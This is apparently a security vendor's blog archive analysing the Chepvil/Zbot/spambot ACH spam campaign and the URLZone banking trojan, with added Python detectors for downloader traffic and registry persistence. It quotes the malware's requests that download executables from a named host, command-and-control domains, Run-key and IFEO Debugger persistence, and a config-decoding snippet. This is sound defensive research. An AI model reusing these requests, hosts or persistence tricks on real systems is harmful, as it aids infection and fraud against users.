Posts Tagged ‘Malware Analysis’


An analysis of the ACH spam campaign

By Rodel Mendrez  •  September 6th, 2011  •   Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious-looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet


The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password-stealing malware Zbot: a standard HTTP request to the domain rattsillis[dot]com fetched the file “s.exe”, a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a randomly generated domain to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache 
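Both requests above share the shape of a hand-rolled downloader fetch: a bare GET for an executable, a legacy MSIE User-Agent, Cache-Control: no-cache, and none of the Accept/Referer headers a browser would send. The following Python is an added example, not code from M86 or from the post, that parses raw HTTP request headers and scores those traits. The two malicious requests are the ones quoted in this post; the benign request, the indicator names and the threshold of two indicators are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Sample input: the two requests quoted in the post (Zbot fetch and spambot
# fetch) plus one constructed benign browser request for contrast.
ZBOT_REQUEST = """GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache
"""
SPAMBOT_REQUEST = """GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache
"""
BENIGN_REQUEST = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
"""

EXECUTABLE_EXTENSIONS = (".exe", ".dll", ".scr", ".pif", ".com")
# Headers a real browser almost always sends; minimal downloaders omit them.
BROWSER_HEADERS = ("accept", "accept-language", "accept-encoding", "referer")


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: dict = field(default_factory=dict)  # header names lower-cased


def parse_request(raw):
    """Parse the request line and header block of a raw HTTP/1.x request."""
    lines = raw.strip("\n").splitlines()
    m = re.fullmatch(r"([A-Z]+)\s+(\S+)\s+HTTP/(\d\.\d)", lines[0].strip())
    if not m:
        raise ValueError("bad request line: %r" % lines[0])
    req = HttpRequest(*m.groups())
    for line in lines[1:]:
        if not line.strip():
            break  # an empty line terminates the header block
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("bad header line: %r" % line)
        req.headers[name.strip().lower()] = value.strip()
    return req


def downloader_indicators(req):
    """Return the list of heuristic indicators this request matches."""
    hits = []
    if req.path.lower().endswith(EXECUTABLE_EXTENSIONS):
        hits.append("executable-path")
    missing = [h for h in BROWSER_HEADERS if h not in req.headers]
    if len(missing) >= 3:
        hits.append("missing-browser-headers:" + ",".join(missing))
    ua = req.headers.get("user-agent", "")
    if re.search(r"MSIE [1-6]\.\d", ua):
        hits.append("legacy-msie-user-agent")
    if (req.headers.get("cache-control", "").lower() == "no-cache"
            and "referer" not in req.headers):
        hits.append("no-cache-without-referer")
    return hits


def is_suspicious(raw, threshold=2):
    """True when at least `threshold` indicators fire (threshold is a constructed choice)."""
    return len(downloader_indicators(parse_request(raw))) >= threshold


if __name__ == "__main__":
    for label, raw in (("zbot", ZBOT_REQUEST), ("spambot", SPAMBOT_REQUEST),
                       ("benign", BENIGN_REQUEST)):
        print(label, is_suspicious(raw), downloader_indicators(parse_request(raw)))
```

Each indicator on its own is weak (old intranet tools still send MSIE 6 strings, and plenty of clients skip Accept-Language), which is why the function returns the list rather than a verdict and `is_suspicious` requires two of them to agree.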

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10 KB.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format KB{6 random digits}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

The malware then adds an autorun registry key to ensure that it survives a Windows restart.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = "C:\Documents and Settings\{user}\Application Data\KB117188.exe"

After installation, the parent spambot process executes the svchost.exe it dropped in the Windows TEMP folder and then exits.

Instead of listening on a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query for the domain name luis-vuitton-elite[dot]com. However, if that fails, the bot attempts to connect to a randomly generated domain name.


The malware code that attempts to connect to the control server


Once connected, the proxy spambot opens a channel on port 1001 over which it sends data packets to and receives them from the control server.

Exchange of data between the control server and the spambot


Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.


The command and control server’s IP address is based in Germany:

WHOIS information about the control server


This spambot’s recent spamming activity includes both pharmaceutical spam and further ACH campaigns that appear to come from NACHA.org, very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events: a spammed-out trojan downloader triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering, and the best way to protect yourself is to be cautious.


Bredolab Trojan – Malware Review

By Daniel Chechik  •  December 23rd, 2010  •   Malware

Two months ago, the authorities in the Netherlands announced a massive takedown of the Bredolab Trojan botnet. Despite these efforts, the Bredolab Trojan is still spreading malware onto users’ machines.

Unlike the Zeus or SpyEye Trojans, the Bredolab Trojan is pretty simple and has limited capabilities, similar to the Ofikla Trojan. Its functionality was reviewed in a very interesting and detailed blog post by Kaspersky Lab expert Alexei Kadiev, “End of the Line for the Bredolab Botnet?” Our blog sheds light on additional aspects of Bredolab’s communication, its evasion techniques and its C&C functionality.

Let’s take a step-by-step look at how the Trojan operates.


Malware Analysis – Trojan Banker URLZone/Bebloh

By Daniel Chechik  •  September 30th, 2009  •   Malware

In our recent Cybercrime Intelligence report, we described the cybercriminal process of robbing money from bank accounts using money mules and Trojans.

In this blog post, we provide more technical details about the Trojan Banker URLZone/Bebloh that they used.

URLZone is a Trojan kit that lets the attacker use the “URLZone Builder” to create a configuration file. This file contains precise orders for the bot, enabling the attacker to target any bank he wants (we described in the Cybercrime Intelligence report how the bot activates the account). URLZone successfully bypassed the German banks’ “One Time Password” protection, a technique that gives the user a new password every time he logs into his account, with the goal of making stolen usernames and passwords worthless. To succeed, the malware must execute inside the browser, change the transaction parameters and fool the user into approving a fraudulent money transfer from his account.

Let’s now take a step-by-step look at how the Trojan operates.

Once the malware is executed, it copies itself to c:\uninstall02.exe. It then creates an ID and sends it, together with the version ID of the malware, to the Command & Control (C&C) server in order to confirm that the infected machine now contains the latest version of the malware.

The C&C logs the information and writes it to REQ[x].txt:
10:57:38 2009-09-24 GMT *****User ID**** ****IP****** 200908291825

Once the new executable is downloaded, it is copied to SYSTEM32 under a random name, with the hidden attribute set and timestamps matching those of the operating system files.

Following is a screenshot of Virus Total scan results (2/41) for the latest generated malware:

It is important to mention that URLZone (just like Zeus/Zbot and others) cannot operate on its own, since it is just a bot that hooks into system processes and hides itself. The logic of the malware is found in the configuration file – in our case the INJECT file. The malware’s next step is to download the configuration file.

Snippet code of the obfuscated configuration file:

The newly generated configuration file is stored locally in encrypted form.

The malware itself doesn’t change any system files. In order to keep working after the victimized machine restarts, it adds itself to the startup registry.

The malware registers itself as the “Debugger” value for the file “userinit.exe”. This ensures that every time “userinit.exe” is launched, the malware runs instead.
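Both persistence techniques described on this page, the HKCU Run entry the ACH spambot writes (KB{6 digits}.exe under Application Data) and the “Debugger” value URLZone sets for userinit.exe (the Image File Execution Options registry mechanism), leave a footprint an analyst can audit in a registry export. The Python below is an added example, not code from either post: it parses a Windows .reg text export and flags both patterns. The export is constructed from the values the two posts name plus one benign Run entry; RANDOMNAME.exe is a placeholder for the random SYSTEM32 file name the post does not give.

```python
import re

# Constructed .reg export (not a capture from an infected host): one benign
# Run entry, the ACH spambot's Run entry, and a URLZone-style IFEO Debugger
# value. RANDOMNAME.exe stands in for the random name the real sample used.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"KB117188.exe"="\"C:\\Documents and Settings\\user\\Application Data\\KB117188.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe]
"Debugger"="C:\\WINDOWS\\system32\\RANDOMNAME.exe"
'''

KEY_LINE = re.compile(r"^\[(.+)\]\s*$")
# "name"="data" with .reg escaping (\\ and \") inside both strings.
STRING_VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"\s*$')
USER_WRITABLE = re.compile(r"\\(application data|local settings\\temp|appdata)\\", re.I)
KB_NAME = re.compile(r"\\KB\d{6}\.exe$", re.I)
IFEO_KEY = re.compile(r"\\image file execution options\\([^\\]+)$", re.I)


def _unescape(s):
    """Undo .reg string escaping: \\\\ -> \\ and \\" -> "."""
    return re.sub(r"\\(.)", r"\1", s)


def _first_token(command):
    """Extract the program path from a command line (quoted or bare)."""
    m = re.match(r'"([^"]+)"|(\S+)', command)
    return (m.group(1) or m.group(2)) if m else command


def iter_string_values(reg_text):
    """Yield (key, value_name, string_data) for every REG_SZ value in the export."""
    key = None
    for line in reg_text.splitlines():
        km = KEY_LINE.match(line)
        if km:
            key = km.group(1)
            continue
        vm = STRING_VALUE.match(line)
        if vm and key is not None:
            yield key, _unescape(vm.group(1)), _unescape(vm.group(2))


def audit_reg(reg_text):
    """Return findings for suspicious Run entries and any IFEO Debugger value."""
    findings = []
    for key, name, data in iter_string_values(reg_text):
        target = _first_token(data)
        if key.lower().endswith("\\currentversion\\run"):
            reasons = []
            if USER_WRITABLE.search(target):
                reasons.append("Run entry launches a binary from a user-writable profile folder")
            if KB_NAME.search(target):
                reasons.append("file name matches the KB{6 digits}.exe pattern")
            if reasons:
                findings.append({"key": key, "value": name, "target": target, "reasons": reasons})
        ifeo = IFEO_KEY.search(key)
        if ifeo and name.lower() == "debugger":
            image = ifeo.group(1)
            findings.append({"key": key, "value": name, "image": image, "target": target,
                             "reasons": ["IFEO Debugger redirects every launch of %s to %s"
                                         % (image, target)]})
    return findings


if __name__ == "__main__":
    for f in audit_reg(SAMPLE_REG):
        print(f["value"], "->", f["target"])
        for r in f["reasons"]:
            print("   ", r)
```

An IFEO Debugger value is reported whenever it exists, because a legitimate debugger attached to userinit.exe on a production machine is rare enough to deserve a look; the Run-key check, by contrast, only fires when the launched binary sits in a profile folder the user can write to.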
The malware hooks itself into the “svchost.exe” process and checks the C&C server every 3 hours for new commands and updates. Behind the scenes, the malware checks every second whether a new instance of one of the following applications has been started:

  • myie.exe
  • iexplore.exe
  • firefox.exe
  • mozilla.exe
  • avant.exe
  • maxthon.exe
  • thebat.exe
  • explorer.exe

Once the malware recognizes that one of the above has been created, it hooks into it. The basic goal of the malware (even without the configuration file) is to collect any credentials the user submits over HTTPS.

In case you wonder why the malware doesn’t collect the credentials from all websites (even though it hooks HTTPS), the answer is simple: the malware uses evasion techniques against security appliances. It limits itself to collecting data that the user sends with the POST method in requests of less than 2,000 bytes, as shown below:

So far the malware behavior is similar to many other Trojans. However, URLZone uses the delivered configuration file to manipulate the user. Once the user opens his browser, the malware decrypts the configuration file:

The decrypting algorithm is pretty simple (every byte is XORed with 255):

res = b""
for i in configuration_file:        # configuration_file: the encrypted bytes read from disk
    res += bytes([255 ^ i])         # XOR each byte with 0xFF to recover the plaintext

Snippet code of the de-obfuscated configuration file:

The configuration file contains several sections – here postbank.de (we are able to follow the malware’s steps using the screenshots it takes on the victim’s machine and transmits to the C&C server):

The malware manages to hook in at the exact moment the victim confirms his transaction. Once the user approves the transaction, the malware changes the transaction details and sends them to the bank’s server.

From the configuration file we can see the following:

In order not to raise any suspicion, the malware verifies that the user will only see what he expects.

As can be seen in the screenshot above, the malware manipulates the account statement page, making it look like the transaction completed as the user intended. However, if we look at the server-side reports, we see exactly how much money was actually transferred.

As can be seen from the server log above, the malware identifies that the user is limited to a maximum transfer of 2000 Euro (INET_LIMIT=2000), so it transferred 1900 Euro (AMOUNT=1900.00) to the money mule account held in the DROPNAME variable.

The following screenshot shows the VirusTotal detection rate (5/41) for the latest version of the URLZone/Bebloh malware (29.9.09):
MD5: 27E8351A5B0BEA5EF15C6681007FDEE5

Posted By Daniel Chechik
